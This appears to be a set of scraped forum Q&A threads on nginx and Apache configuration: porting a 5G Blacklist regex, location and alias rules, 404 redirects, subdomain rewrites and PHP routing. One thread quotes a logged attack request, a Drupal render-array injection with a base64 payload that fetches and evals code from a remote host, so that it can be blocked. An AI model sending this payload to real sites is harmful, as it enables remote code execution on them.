Same regex behaving differently in Apache and Nginx - regex

I'm trying to covert 5G Blacklist to from Apache(.htaccess) to Nginx(.conf). There is a line in .htaccess that is causing problem:
<IfModule mod_alias.c>
RedirectMatch 403 (\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")
</IfModule>
I have converted it to .conf as follows:
Code included in http block
map $request_uri $bad_uri {
default 0;
"~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}
Code included in server block
if ($bad_uri) {
return 403;
}
As far as I know both Apache and Nginx use perl regex so no change should be required when converting from former to the latter. However, following URI is giving 403 on Nginx but working fine on Apache:
www.example.com/some,url,with,commas
www.example.com/?q=some,url,with,commas

Finally found the issue.
In Apache RedirectMatch matches only the url without query string whereas $request_uri in nginx maps to url with query string.
So the correct code for Nginx is:
map $uri $bad_uri {
default 0;
"~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}

Related

eval base64 virus - nginx regex prevention

this is a common virus that hits with a post URI like:
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
How to prevent it from going through nginx?
I tried
location ~* base64 {
return 404;
}
to put down any request with base64 in it but it doesn't work. Please help and give me the right nginx regex rule. (I can't modify the app codebase or update the system).
if ($query_string ~ "base64") {
return 404;
}

How do I make a regex nginx location work?

I have the following locations in my nginx config:
server {
listen 80;
server_name localhost;
location ~ ^/(?!api)(.*)/api {
alias /var/www/api/$1;
}
location /api {
alias /var/www/api/latest;
}
I am trying to match /api as the latest version, and /<version>/api as anything else. The non regex location is working fine, but I am getting a 403 on the other location.
I don't think it is anything to do with the file and permissions that are being served, as I get a 403 if I try to access
/latest/api
even though these are the same files that are served by
/api
Does anyone have an ideas about why I am getting a 403?
The nginx error is:
directory index of "/var/www/api/latest" is forbidden, client:
172.17.0.1, server: localhost, request: "HEAD /latest/api/ HTTP/1.1",
host: "localhost"
The problem is not with the regular expression, but with the use of the alias directive within a regular expression location. See this document for more.
On a related note, rather than using a negative lookahead assertion, you should use the ^~ modifier on the prefix location. See this document for more.
For example:
location ~ ^(/[^/]+)/api(.*)$ {
alias /var/www/api$1$2;
}
location ^~ /api {
alias /var/www/api/latest;
}

How to 301 redirect ALL non-existing page to main domain?

I have googled but most uses are when person knows their URLs yet i want to redirect all possible URLs that give 404/503 errors with 301 to main domain.
Preferably htaccess since site is html.
So any request to page domain.com/XXXX that doesnt exist should redirect to main instead of giving errors ie:
Not Found
The requested URL /eafsdg was not found on this server.
To redirect all non existent and 503 requests to newdomain, you can use
ErrorDocument 404 http://newdomain.com/
ErrorDocument 503 http://newdomain.com/
In NGINX it would be like this :
NOTE: Since I use and I think a lot of people use NGINX as a proxy server, this won't redirect bad pages if the location is a proxy, that needs to be configured on the actual server, so I ended up using starkeen's answer on the end Apache server, but thought id share for NGINX.
error_page 404 /custom_404.html;
location = /custom_404.html {
root /usr/share/nginx/html;
internal;
}
or
error_page 404 /;
location = / {
root /usr/share/nginx/html;
internal;
}
https://www.digitalocean.com/community/tutorials/how-to-configure-nginx-to-use-custom-error-pages-on-ubuntu-14-04
Try this .htaccess code to redirect all 404 page to homepage:
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . / [L,R=301]

nginx sub-subdomain wildcard

I'm having troubles setting up a reverse proxy for a sub-subdomain using nginx.
I'm trying to create a configuration which allows me to resolve:
a.b.example.com ==> a.local.host.lan
Currently i am able to resolve it as follows:
a.b.example.com ==> a.b.local.host.lan
with following configuration:
server {
listen 80;
server_name ~^(.*)\.b.example\.com$;
set $servername $1;
rewrite ^(.*)$ https://$servername.local.host.lan;
}
any idea how to tokenize the $servername variable so i can split a and b?

Nginx: How to rewrite all URLs except of images?

I'm new to nginx and I want to migrate my website from Apache to nginx. My site has URLs like:
www.mywebsite.com/category/product/balloon
www.mywebsite.com/category/product/shoe
www.mywebsite.com/information/help
etc.
Since I'm using PHP I need to rewrite all URLs to index.php except if it's an image OR if it's a "fake-request". My nginx.config so far:
#block fake requests
location ~* \.(aspx|jsp|cgi)$ {
return 410;
}
#rewrite all requests if it's not a image
location / {
root html;
index index.php 500.html;
if (!-f $request_filename) {
rewrite ^(.*)$ /index.php?q=$1 last;
break;
}
}
error_page 404 /index.php;
# serve static files directly
location ~* ^.+.(jpg|jpeg|gif|css|png|js|ico)$ {
access_log off;
}
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME E:/test2/html/$fastcgi_script_name;
include fastcgi_params;
}
This configuration does not work because:
1. It doesn't block fake request to .php files and I can't add .php to (aspx|jsp|cgi)$
2. It doesn't rewrite the URL if the file exists which is wrong: It should only serve static files directly if it's a defined file-type in(jpg|jpeg|gif|css|png|js|ico)$
How can I solve these problems? I really appreciate every answer, clarification or feedback you can give me.
Thanks
Mike
You need to configure the HttpRewriteModule. This module makes it possible to change URI using regular expressions (PCRE), and to redirect and select configuration depending on variables.
If the directives of this module are given at the server level, then they are carried out before the location of the request is determined. If in that selected location there are further rewrite directives, then they also are carried out. If the URI changed as a result of the execution of directives inside location, then location is again determined for the new URI.